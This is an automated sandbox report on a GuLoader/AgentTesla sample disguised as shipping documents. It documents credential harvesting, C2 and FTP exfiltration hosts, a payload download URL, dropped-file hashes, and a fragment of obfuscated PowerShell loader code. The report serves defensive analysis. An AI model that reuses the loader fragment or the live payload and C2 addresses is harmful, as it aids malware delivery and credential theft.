Source: Yara match	File source: 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 3876, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 3876, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 3876, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	111 Process Injection	1 DLL Side-Loading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Shipping documents 000309498585956000797900.exe	21%	ReversingLabs	Win32.Trojan.Guloader
Shipping documents 000309498585956000797900.exe	100%	Avira	HEUR/AGEN.1357304

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe	100%	Avira	HEUR/AGEN.1357304
C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe	21%	ReversingLabs	Win32.Trojan.Guloader

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.ipify.org	104.26.13.205	true	false	unknown
concaribe.com	192.185.13.234	true	true	unknown
ftp.concaribe.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2907254415.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ftp.concaribe.com	msiexec.exe, 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://concaribe.com	msiexec.exe, 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_Error...	Shipping documents 000309498585956000797900.exe, 00000000.00000000.2041425401.0000000000409000.00000002.00000001.01000000.00000003.sdmp, Shipping documents 000309498585956000797900.exe, 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmp	false		unknown
https://api.ipify.org/t	msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin~	msiexec.exe, 00000006.00000002.3291573272.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2907254415.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.m$	powershell.exe, 00000001.00000002.2912266214.0000000006ED1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
84.38.133.140	unknown	Latvia	203557	DATACLUB-NL	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
192.185.13.234	concaribe.com	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520706
Start date and time:	2024-09-27 18:32:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Shipping documents 000309498585956000797900.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/15@2/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 150 Number of non-executed functions: 57
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6396 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Shipping documents 000309498585956000797900.exe

Simulations

Behavior and APIs

Time	Type	Description
12:32:58	API Interceptor	34x Sleep call for process: powershell.exe modified
12:34:26	API Interceptor	320x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.13.205	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	HyZh4pn0RF.exe	Get hash	malicious	Creal Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	SecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	file.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	rQuotation3200025006.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	mSLEwIfTGL.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DATACLUB-NL	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.29.11.53
	Shipping documents 000022999878999800009999.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.29.11.53
	Ze1Ueabtx5.img	Get hash	malicious	AgentTesla, GuLoader	Browse	185.29.11.53
	Documenti di spedizione 0009333000459595995.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.29.11.53
	PO 00009876660887666000.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.121
	Bankcopyscanneddoc.exe	Get hash	malicious	RedLine	Browse	84.38.129.21
	xCjIO3SCur0S.exe	Get hash	malicious	Remcos	Browse	185.29.11.23
	new.cmd	Get hash	malicious	GuLoader	Browse	185.29.11.28
	temp.cmd	Get hash	malicious	Unknown	Browse	185.29.11.28
	price_request_.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.29.11.62
CLOUDFLARENETUS	HyZh4pn0RF.exe	Get hash	malicious	Creal Stealer	Browse	172.67.74.152
	http://www.jp-area.com/beppu/rank.cgi?mode=link&id=218&url=https://0oenqK.startprogrammingnowbook.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.213
	https://www.pineapplehospitality.net/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Blank Grabber	Browse	162.159.133.233
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://mercado.defontana.com/loginExterno/IaQsEFxmZUCwWgcKW2iAg	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
UNIFIEDLAYER-AS-1US	DHL-AWB#TRACKING907853880911.bat	Get hash	malicious	AgentTesla	Browse	173.254.28.210
	EreglishipyardFiyat Teklif Talebi.pdf.exe	Get hash	malicious	AgentTesla	Browse	108.167.140.123
	https://nio.byd.mybluehost.me/wp-admin/includes/ss/sb/	Get hash	malicious	Unknown	Browse	50.6.153.174
	shipping documents.exe	Get hash	malicious	AgentTesla	Browse	162.214.80.31
	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	162.241.61.68
	http://direcprimviva.com/acessar.php	Get hash	malicious	Unknown	Browse	192.185.222.148
	https://novo.oratoriomariano.com/novo/99417/Entry.html	Get hash	malicious	Unknown	Browse	162.241.61.68
	https://novo.oratoriomariano.com/novo/11614/	Get hash	malicious	Unknown	Browse	162.241.61.68
	https://globaltechnicalsystems.lk/portal/post/dhlAr/	Get hash	malicious	Unknown	Browse	162.214.157.176
	http://alibinaadi.com/.well-known/alibaba/Alibaba/index.php	Get hash	malicious	Unknown	Browse	173.254.68.150

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://www.pineapplehospitality.net/	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	104.26.13.205
	SecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://effective-teammates-567500.framer.app/	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	https://main.d3engbxc9elyir.amplifyapp.com/	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	104.26.13.205
	Richardson Electronics, LTD. PRD10221301UUE.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	PURCHASE ORDER ADDISON-6378397379UUE.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://polskie-torrenty.eu/redir.php?url=https://globalfinanceweb.com%2FProfile%2Fluig%2Fnzx0k%2FmProtect.html%23abrumley@highlandfunds.com	Get hash	malicious	Unknown	Browse	104.26.13.205

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jbxwh01.chs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qoe1livw.2w1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	5.195875603619049
Encrypted:	false
SSDEEP:	96:re5Vl/7KOuFlKHMpXGu8FX6eT3sQk1u2QmIGvebAQvL7hDAbUlV:65Vl+hSs2u85TTHkZQmubLL7hDMo
MD5:	5D63878DA0CDA0B331E80E43E3D3C2FA
SHA1:	749B02A5BCEB2D1F8A912DFAF40FE8C3B082BF58
SHA-256:	21EB98AA735FC4B4072E670A78F1E5802B3D3C950BEF72E32F573DD514AC7F18
SHA-512:	240CCBD96BBF5D4608778B91AB14B73B20771FFF3763E8DF04A9DF83F5371D4ADA64B5B6CC262626927EE1C13FC0D98BFAAA0332786C0AF588A4C24924575ED1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C\.."2U."2U."2UjP3T."2U."3U."2U{W6T."2U{W2T."2U{W0T."2URich."2U................PE..L...Y+.c.........."!......................... ...............................P............@..........................!..l...."..P............................@....................................................... ...............................text...#........................... ..`.rdata..&.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Cosmopolitanising.col

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	data
Category:	dropped
Size (bytes):	369480
Entropy (8bit):	1.2481431502483955
Encrypted:	false
SSDEEP:	768:rRtHMGSSGym0GvY1hW6IWahE7Wv7zT0usCP6u7iaqflywWTGLMk/4LnwvB4nUq6F:rzMsGyD1CQ6Qqwa9DMXDEUMN2H9mSRd
MD5:	7A51F952314931F78E15E10CCDFDD4A6
SHA1:	EC01397588C61F15D589BA0D6C684D2514171376
SHA-256:	6CBFFDA90A33E4B379B2A0FC277C560BA4DC005EE5BEABE37472F702248B5C78
SHA-512:	E0AB5897562EE6B1EBF271FA19CDEDAEBCF93DBB006130A959E51D0B3BEBBF91C112D11FEB7AA8EE4704973730F60C3C46453364720FF8DF00FBE52366883CBA
Malicious:	false
Preview:	..........v........................................................................0........l....................................................x.C......-........................................K............W...........*(.............................\|.................z........................{...............................................4......'............$..................... .............#................5.....-.................O.................................J...."..................Y...~............n..............r....................=..................U.........-......................................................................................................^.............................................................................#...........9......................................................................................................................................................................\|...........................................................

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	74392
Entropy (8bit):	5.199413846614902
Encrypted:	false
SSDEEP:	1536:fZf2tn3YvW1qxnCFkB6bLxwBEwYIoZx0DKntzW5kdF34+mXIzwPi7nvrALj29pe:BCETIFkU5wy0DYWjxhPi7TA8pe
MD5:	E2DF89F3AFDD3B0CA4CBEF2B70903B01
SHA1:	2291A0ED4A9A2C5DF3138F42BBE3D72A441461A8
SHA-256:	EB337ED184F884C1DEC3C08C74FDAF9E513CA7086BD7CCCEAF3511829CA54E81
SHA-512:	0C18FE4CA7AC53E3D0B63D43064D8E3E25A055325042B4F1038BECE4A7B7717FEBF08A0F97D10D3234A5E4A5CAEF239387C66690C3BE522E68F4888702055BD6
Malicious:	false
Preview:	$Ringsider=$Phytoptosis;<#Livstestamenters Schemery Hierakiet #><#Unlabialises Gymnostomous Chylocaulous Replotting Serailet Tormentillenes #><#Thamnophilus Kragerede Talaria Vesiculotympanic #><#bandereklamer Heldets Satsudkrselen Babels #><#Bjlkevrk Cymagraph Arbejdslnninger Amala Bagind Attributionerne #><#Kombipakken Redactors Benzoate Familieplanlgnings Stramajbroderiets #>$Hovedspring = " edelin; Laundr`$UnpalpaSgalakseh hetlanaOppos trMusterip Un itu=U debas`$ OrdfjnFLivsrumiIcoddetrEnsilage Lyri itMicklesoCandi awsyntagmeapterygr Ecbser;OejeblifArbe deuArthrosnDatauhecDip thotSwayingi LandzooStopursnBrynjek LgthdepR Buq,hae SkippedAnkiesgi.ktiverr ,ompluesodomitcFlisebetBrdstru Lej,re(magtfak`$LaceyspTKonditor Fant ssunuseabtIntisyneScrotaurVilmasei,uborecgMessias,Faldsta`$AltheinTZinnniaiHipparcl Tamb rlMonitorr.onnasoiSiderognForbestgSaltcateMutateprCinn,manPl onaseRodls fsLnkerad) vecti Forbear{St.ejke.Gennems`$arethusU Marketn ,irvardFnblgnieMaturerrGallstonAdequatoTermit

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Prefaces.Jal

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	data
Category:	dropped
Size (bytes):	322023
Entropy (8bit):	7.690636487928766
Encrypted:	false
SSDEEP:	6144:H2E0Z0LauJLlzhLGMBLeRWLNkvKcL4L2sq+P9NKEUNa+K0Hc:hzZ/BSkJ4KUCqg9Nfaa+K7
MD5:	6E673E7179AAABB9AB1520DF399DCA08
SHA1:	6AF2A4F10568E5B549DB34AE133E8B948DA8BC81
SHA-256:	D85D0441841CB77E0C3A008687E41D7EDA78E35CB2DC692DD9006A719524025C
SHA-512:	7418D82D3F65158A85AF3EB5090DC4B65E82E96B9BBD221AACBF296D02F82BCFA833640C5E3FCEA5123D762A902097A4834EE4126FD0B4F6CE43C8D40812B67D
Malicious:	false
Preview:	...........pp.......!..................b.g.pp.......yyy..ww.........c..PP....?.h............-----.......66..........GGG.PP.......................6....\.........................Z........l............R.............$..~......s....6.......YYYYYYYY.......}}....\\..........--..............................??............wwwww.......,......m.....................zz.....MM..6...............WW....0...............@..{.eeeee.11.@@.zz...II..TT......YY.......O..bb......................................\\.................QQ.......9....................................=.JJJ..............).4.............UUUU...............;.............................`````........77.................................Y...tttttt..............\.VV............YYYYYY.........5......................Q.............T...............tt....88888..................NN.MM...%%%.........................................................,....u..kk..........................***............==.......rr..........................................

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1081112
Entropy (8bit):	6.186153453421366
Encrypted:	false
SSDEEP:	12288:5faWYFsj2FYoIAyPn4/SLfP2Udh1rtZJi3l/zSL6WKuwpbt+jBL/nepC:ldeXi4/42Up5KV/zSOWlabAjNnKC
MD5:	94C700B33FB2A1AA2BD02F13750CCA75
SHA1:	ABE3ABD4F60778DFA694A8FC54B9D1037A248132
SHA-256:	9F40759902174555AB1294EB92AE2D17AD2698D2E0E68694EDBB9684BDAB7692
SHA-512:	B1962793A313490385CE265763A05585ABF1793336FFBBB853FC64B6807E35EC98B28DAEBE147F98BB901A804CE88BC930C33B7938F31B51B9C9A0C258DECC5A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r...........6............@.......................................@..........................................@...............u...............................................................................................text...2p.......r.................. ..`.rdata...............v..............@..@.data...............................@....ndata.......`...........................rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\bevidstheds.cir

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	data
Category:	dropped
Size (bytes):	30558
Entropy (8bit):	1.2565581632129332
Encrypted:	false
SSDEEP:	192:KPshpf6MZR3Bm64GgtH+J5bVD/gv+IhCQaS8HUPLe:KPUf663M64PtH+XbVD/2hhCQaNUPLe
MD5:	C82527F49EB89E59FE5958CE1DFC5B6E
SHA1:	43C01E5BE8849BA46C914C2C3A8878D1D98B15A9
